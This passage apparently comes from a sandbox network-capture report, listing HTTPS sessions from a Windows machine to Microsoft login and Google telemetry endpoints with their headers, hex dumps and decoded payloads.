                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      24192.168.2.54983840.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:52 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: ac700725-a905-4e55-92e1-86c368a4b7a9
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002FA76 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      25192.168.2.54984040.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:52 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: fee88149-1372-4350-89be-7479dcb73c4c
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F068 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1918
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      26192.168.2.549841142.250.105.1004438152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC549OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                                      Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      27192.168.2.549842142.250.105.1004438152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC549OUTOPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Access-Control-Request-Method: POST
                                                                                                                                                                                                                                      Access-Control-Request-Headers: x-goog-authuser
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                      Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      28192.168.2.549843142.250.105.1004438152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC1321OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 521
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      X-Goog-AuthUser: 0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: NID=513=CSbWbIUIJiVwRCWJW5w0-llvTcpKQxKeTBtMAG_A1r-Ke11UnCSiWvmA-ZZmVuAtTjhQoR-cuqyxOr8EsQzZ6XgOuuWXHCB5ATA7X6Of_FmCezhFNF6eox60e888AEMMCicnVFjL5u4Cgdc2u3lwj6G8e7HQXFts4EWtSxLH0N8
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC521OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 31 33 34 39 30 31 39 32 31 30 37 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                                                                                                                                                                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1713490192107",null,null,null
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC925INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                      Set-Cookie: NID=513=fIomzTyeeIx3JW2Kp7mYMo-5w2x2QyQwK-Zr3XFVGBOwe-0tzmvxLEKWb4VJJYGV9lSeFsVnLcnwNM2sSDc4iKRmYQD40QJgg511iODE8S_GWqHNVunbrx_ZbzUbvEV3AzfFuBZJcUe6nrZgQKeYbLlsy9HUbcOEF2z_rQwsKN4; expires=Sat, 19-Oct-2024 01:29:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      29192.168.2.549844142.250.105.1004438152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC1321OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Content-Length: 521
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                      X-Goog-AuthUser: 0
                                                                                                                                                                                                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                      sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                      sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Origin: https://accounts.google.com
                                                                                                                                                                                                                                      X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://accounts.google.com/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: NID=513=CSbWbIUIJiVwRCWJW5w0-llvTcpKQxKeTBtMAG_A1r-Ke11UnCSiWvmA-ZZmVuAtTjhQoR-cuqyxOr8EsQzZ6XgOuuWXHCB5ATA7X6Of_FmCezhFNF6eox60e888AEMMCicnVFjL5u4Cgdc2u3lwj6G8e7HQXFts4EWtSxLH0N8
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC521OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 31 33 34 39 30 31 39 32 31 30 39 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c
                                                                                                                                                                                                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1713490192109",null,null,null
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC925INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                      Set-Cookie: NID=513=Wn_CXjX-2VcI2iEH6-uf7IUePLFc4zBcZ5vvY-BWgQvpNRI2f83XMZSN8I8vpr_zVSnn2kuylSlPWe9bMQ9F7_ZSYiXZB3ejeKgovAjDWcyn1Rq4N3Q7gs6ZYzU-MpFJmgiei_3kV_Pkj1gTb1dtpR074N1k4RWBiyHeYX0t3hs; expires=Sat, 19-Oct-2024 01:29:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:29:53 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      2024-04-19 01:29:53 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
